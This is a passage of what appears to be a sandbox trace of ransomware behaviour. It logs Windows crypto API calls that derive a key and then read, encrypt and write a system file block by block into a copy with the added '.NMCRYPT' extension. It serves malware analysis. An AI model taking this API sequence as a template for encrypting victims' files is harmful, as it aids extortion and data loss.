(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.852] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.852] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.853] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44474c | out: phHash=0x1d44474c) returned 1 [0166.853] CryptHashData (hHash=0x9ad178, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.853] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444750 | out: phKey=0x1d444750*=0x9ad5b8) returned 1 [0166.853] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.853] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.853] wcslen (_String="\\\\?\\") returned 0x4 [0166.853] CryptDuplicateKey (in: hKey=0x9ad5b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad138) returned 1 [0166.853] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.854] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.854] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=14856) returned 1 [0166.854] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0166.855] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.856] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.856] GetLastError () returned 0x0 [0166.856] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.857] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.857] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.857] GetLastError () returned 0x0 [0166.857] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.857] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.857] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.857] GetLastError () returned 0x0 [0166.857] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.857] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.857] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.857] GetLastError () returned 0x0 [0166.857] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.857] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.857] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.858] GetLastError () returned 0x0 [0166.858] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.858] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.858] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.858] GetLastError () returned 0x0 [0166.858] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.858] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.858] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.858] GetLastError () returned 0x0 [0166.858] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.858] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.858] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.858] GetLastError () returned 0x0 [0166.858] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.858] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.858] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.858] GetLastError () returned 0x0 [0166.858] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.858] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.858] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.858] GetLastError () returned 0x0 [0166.858] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.858] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.858] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.858] GetLastError () returned 0x0 [0166.858] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.858] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.859] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.859] GetLastError () returned 0x0 [0166.859] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.859] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.859] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.859] GetLastError () returned 0x0 [0166.859] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.859] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.859] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.859] GetLastError () returned 0x0 [0166.859] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.859] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.859] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.859] GetLastError () returned 0x0 [0166.859] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.859] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.859] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.859] GetLastError () returned 0x0 [0166.859] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.859] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.859] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.859] GetLastError () returned 0x0 [0166.859] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.859] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.860] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.860] GetLastError () returned 0x0 [0166.860] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.860] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.860] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.860] GetLastError () returned 0x0 [0166.860] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.860] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.860] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.860] GetLastError () returned 0x0 [0166.860] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.860] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.860] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.860] GetLastError () returned 0x0 [0166.860] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.860] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.860] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.860] GetLastError () returned 0x0 [0166.860] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.860] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.860] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.860] GetLastError () returned 0x0 [0166.860] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.860] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.860] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.860] GetLastError () returned 0x0 [0166.860] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.860] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.861] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.861] GetLastError () returned 0x0 [0166.861] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.861] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.861] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.861] GetLastError () returned 0x0 [0166.861] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.861] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: 